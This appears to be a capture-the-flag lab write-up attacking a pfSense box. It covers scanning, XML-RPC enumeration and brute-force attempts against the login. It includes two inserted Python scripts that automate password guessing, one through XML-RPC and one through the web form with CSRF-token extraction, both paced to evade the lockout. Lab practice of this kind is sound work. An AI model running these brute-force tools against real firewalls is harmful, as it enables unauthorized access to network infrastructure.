10.10.10.60
Recon
Port Scan
PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
Enumerate attack surface
Webserver
- 80: lighttpd 1.4.35 (http)
- 443: lighttpd 1.4.35 (https)
Public exploits.
A closer look at the webserver
pfSense? Is that you?
Findings from the scan.
└─$ cat */*ferox* | grep -E '^200' | sort -u
200  10l  40w  271c https://10.10.10.60/changelog.txt
200 173l 425w    0c https://10.10.10.60/
200 173l 425w    0c https://10.10.10.60/edit.php
200 173l 425w    0c https://10.10.10.60/exec.php
200 173l 425w    0c https://10.10.10.60/graph.php
200 173l 425w    0c https://10.10.10.60/help.php
200 173l 425w    0c https://10.10.10.60/index.php
200 173l 425w    0c https://10.10.10.60/interfaces.php
200 173l 425w    0c https://10.10.10.60/license.php
200 173l 425w    0c https://10.10.10.60/pkg.php
200 173l 425w    0c https://10.10.10.60/stats.php
200 173l 425w    0c https://10.10.10.60/status.php
200 173l 425w    0c https://10.10.10.60/system.php
200 173l 425w    0c https://10.10.10.60/wizard.php
200  17l  26w  384c https://10.10.10.60/xmlrpc.php
200  24l  32w  329c https://10.10.10.60/index.html
200   7l  24w 1406c https://10.10.10.60/favicon.ico
Most of those pages were behind a login page. I could only access:
- changelog.txt
  - which mentions a recent patch FAILED; it only patches 2 of 3 vulnerabilities.
- xmlrpc.php
  - which shows some XML error (probably because I'm doing a GET request and it's expecting a POST with some command). Following the HackTricks guide to XML-RPC, I was able to get a list of valid commands. This can be used to brute-force creds if needed.
Do a POST with this payload:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
While researching how to use pfSense's XMLRPC, I came across this exploit. The exploit requires credentials, but grants RCE. More about this weakness at NVD.
It looks like the exploit is using this XML payload to check the credential (only the password, I guess?):
<?xml version='1.0' encoding='iso-8859-1'?>
<methodCall>
<methodName>pfsense.host_firmware_version</methodName>
<params>
<param><value><string>PASSWORD_HERE</string></value></param>
</params>
</methodCall>
So I will check this, and brute-force if possible.
Appears to be working! (Incorrect password)
Now for the brute-force... Well, that was short-lived. 75 requests worked, but now everything is timing out. In fact, it appears the whole webserver is down now. Wait... duh... my IP is probably deny-listed.
:'(
Reverting... Will have to do something different for the brute-force attack. I could try the name of the box as the password...
Also, just noticed lighttpd has some DoS vulnerability; apparently the requests are just going too quickly for it to handle. If I slow them down, maybe my brute force will get past 80 requests :)
- index.html
  - which has a link to install DragonFly BSD
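A scripted version of the two XML-RPC steps above (the system.listMethods enumeration and the pfsense.host_firmware_version password check from the exploit), paced so it does not repeat the lockout described above. This is an added example, not the page's own code and not the exploit script the notes refer to. The endpoint URL is the box from the notes; fake_pfsense is a constructed stand-in for xmlrpc.php so the block runs offline; and two things are assumptions to verify against the real box: that a wrong password comes back as an XML-RPC fault rather than a normal value, and that a correct one returns the firmware version string ("2.1.5-RELEASE" here is sample data). The pacing and the stop-on-timeouts logic are there because pfSense's sshlockout_pf adds a source address to the webConfiguratorlockout pf table after repeated webConfigurator authentication failures, which from the client side looks exactly like "75 requests worked, now everything is timing out".

```python
import ssl
import time
import urllib.request
import xmlrpc.client
from typing import Callable, Iterable, Optional

# Target from the notes; xmlrpc.php is pfSense's XML-RPC endpoint.
XMLRPC_URL = "https://10.10.10.60/xmlrpc.php"


def build_call(method: str, params: tuple = ()) -> bytes:
    """Serialise a <methodCall>. With params=() this is the system.listMethods
    payload from the notes; with one string it is the credential check."""
    return xmlrpc.client.dumps(params, methodname=method,
                               encoding="iso-8859-1").encode("iso-8859-1")


def parse_response(body: bytes):
    """Classify a <methodResponse>: ('ok', value) or ('fault', code, message)."""
    try:
        params, _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        return ("fault", fault.faultCode, fault.faultString)
    return ("ok", params[0] if params else None)


def list_methods(send: Callable[[bytes], bytes]):
    """The HackTricks step: ask the endpoint which methods it exposes."""
    kind = parse_response(send(build_call("system.listMethods")))
    return kind[1] if kind[0] == "ok" else []


def password_accepted(send: Callable[[bytes], bytes], password: str) -> bool:
    """Assumption: wrong password -> XML-RPC fault, right password -> a value
    (the firmware version). Verify this against the real box first."""
    body = send(build_call("pfsense.host_firmware_version", (password,)))
    return parse_response(body)[0] == "ok"


def brute_force(send: Callable[[bytes], bytes], candidates: Iterable[str],
                delay: float = 1.0, max_errors: int = 3) -> Optional[str]:
    """Paced guessing: sleep between attempts and give up after a run of
    transport errors instead of hammering a host that has stopped answering
    (a locked-out source IP sees exactly that: every request times out)."""
    errors = 0
    for password in candidates:
        try:
            if password_accepted(send, password):
                return password
        except OSError:  # URLError, socket.timeout and ConnectionError all qualify
            errors += 1
            if errors >= max_errors:
                return None
            time.sleep(delay * 5)
            continue
        errors = 0
        time.sleep(delay)
    return None


def http_sender(url: str = XMLRPC_URL, timeout: float = 10.0) -> Callable[[bytes], bytes]:
    """Real transport: POST the body over HTTPS, tolerating the self-signed cert."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE

    def send(body: bytes) -> bytes:
        req = urllib.request.Request(url, data=body, method="POST",
                                     headers={"Content-Type": "text/xml"})
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.read()
    return send


def fake_pfsense(password: str, lockout_after: int = 75) -> Callable[[bytes], bytes]:
    """Constructed stand-in for xmlrpc.php so the block runs offline: answers
    listMethods, accepts one password, faults on the rest, and after
    `lockout_after` failures stops answering, as a locked-out client would see."""
    state = {"failures": 0}

    def send(body: bytes) -> bytes:
        if state["failures"] >= lockout_after:
            raise ConnectionError("timed out (source IP locked out)")
        params, method = xmlrpc.client.loads(body)
        if method == "system.listMethods":
            methods = ["system.listMethods", "pfsense.host_firmware_version"]
            return xmlrpc.client.dumps((methods,), methodresponse=True).encode()
        if method == "pfsense.host_firmware_version" and params and params[0] == password:
            return xmlrpc.client.dumps(("2.1.5-RELEASE",), methodresponse=True).encode()  # sample value
        state["failures"] += 1
        return xmlrpc.client.dumps(xmlrpc.client.Fault(4, "Authentication failed")).encode()
    return send


if __name__ == "__main__":
    send = fake_pfsense("pfsense")  # swap for http_sender() against a real box
    print(list_methods(send))
    print(brute_force(send, ["123456", "password", "pfsense"], delay=0))
```

Against a live box, pass `http_sender()` as `send` and keep `delay` at a second or more; when `brute_force` returns None after a burst of errors, stop and wait for (or revert) the lockout rather than retrying, since each further failure extends it.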
I crashed the damn thing again... Moving to another box; may have to revert this when I come back. Sort of jumped right in and skipped enumerating the attack surface; maybe take a step back when I come back to it.
After reverting and scouring the internet, the above screenshot seems to be tied to v2.1.5 of pfSense.
After reviewing the exploits on here, I've come full circle. I'm back at the XMLRPC exploit, but I still need credentials. Maybe I can modify the Python exploit to brute-force as well.
Downloading this exploit.
Split the file: lines 1-90 into info.txt and 91+ into pfsense-rce.py.
This still isn't working... maybe I can bypass the session thing on the login page using Burp. I found some notes about using Intruder to update dynamic session values during a brute force; this may be the ticket.
Identifying changing values
Reply 31
- set cookie_test
- set __csrf_magic
Request 32
- updated cookie_test
- updated __csrf_magic (is URL encoded)
Using Burp Intruder, with the following positions set (username is always admin):
Then set up Grep - Extract in Options to get around the session management:
Now to set payloads:
Note: for payload 2, I've added "," to the Payload Encoding char list.
For the wordlist, I've decided to use rockyou.txt. This has stalled Burp while it loads.
Trying to run this is causing my CPU to spike pretty heavily.
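What the Intruder setup above does by hand (re-fetch the login page, Grep - Extract the new __csrf_magic, let the cookie jar carry the updated cookie_test, URL-encode the comma in the token) as a script, so the same brute-force can run without loading rockyou.txt into Burp. This is an added example and not the page's own code. Assumptions to check against the captured request: the form posts to index.php and uses the pfSense 2.x field names usernamefld, passwordfld and login; SAMPLE_LOGIN_PAGE is a constructed stand-in for the real response; and login_succeeded uses the heuristic that a failed login re-renders the form while a successful one does not.

```python
import html
import http.cookiejar
import re
import ssl
import urllib.parse
import urllib.request
from typing import Optional

# Box from the notes; the login path and field names are assumed from pfSense 2.x.
LOGIN_URL = "https://10.10.10.60/index.php"

# csrf-magic emits the token as a hidden input; accept either quote style.
CSRF_RE = re.compile(r"""name=['"]__csrf_magic['"][^>]*?value=['"]([^'"]+)['"]""")

# Constructed sample of a login-page body (not a real capture); the token keeps
# the sid:...,timestamp shape, including the comma the Intruder note is about.
SAMPLE_LOGIN_PAGE = """<form action="/index.php" method="post">
<input type='hidden' name='__csrf_magic' value="sid:0123456789abcdef,1507400000" />
<input name="usernamefld" type="text" />
<input name="passwordfld" type="password" />
<input name="login" type="submit" value="Login" />
</form>"""


def extract_csrf(page: str) -> Optional[str]:
    """The Grep - Extract step: pull the current __csrf_magic out of a response."""
    match = CSRF_RE.search(page)
    return html.unescape(match.group(1)) if match else None


def build_login_body(username: str, password: str, token: str) -> bytes:
    """Form-encode the POST. urlencode percent-encodes the comma in the token
    (%2C), which is what adding "," to the Payload Encoding list achieves in Burp.
    Field names are pfSense 2.x's (assumption; confirm from the captured request)."""
    return urllib.parse.urlencode({
        "__csrf_magic": token,
        "usernamefld": username,
        "passwordfld": password,
        "login": "Login",
    }).encode()


def login_succeeded(page: str) -> bool:
    """Heuristic (assumption): a failed login re-renders the form with a fresh
    token; a successful one lands on the dashboard, which has no username field."""
    return "usernamefld" not in page


def make_opener() -> urllib.request.OpenerDirector:
    """A cookie jar does what Burp's session handling did for cookie_test:
    every request carries whatever the previous response set."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # self-signed pfSense certificate
    jar = http.cookiejar.CookieJar()
    return urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(jar),
        urllib.request.HTTPSHandler(context=ctx))


def try_login(opener: urllib.request.OpenerDirector, username: str, password: str,
              url: str = LOGIN_URL, timeout: float = 10.0) -> bool:
    """One attempt: GET the form (fresh cookie and token), then POST with both."""
    page = opener.open(url, timeout=timeout).read().decode("utf-8", "replace")
    token = extract_csrf(page)
    if token is None:
        raise ValueError("login page carried no __csrf_magic token")
    req = urllib.request.Request(url, data=build_login_body(username, password, token),
                                 method="POST")
    with opener.open(req, timeout=timeout) as resp:
        return login_succeeded(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Offline demonstration on the constructed page.
    token = extract_csrf(SAMPLE_LOGIN_PAGE)
    print(token)
    print(build_login_body("admin", "pfsense", token))
```

To run it against the box, loop `try_login(make_opener(), "admin", candidate)` over the wordlist with a sleep between attempts; the lockout that took the XML-RPC attempts down applies to these logins too, so the pacing is not optional.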
Time's up...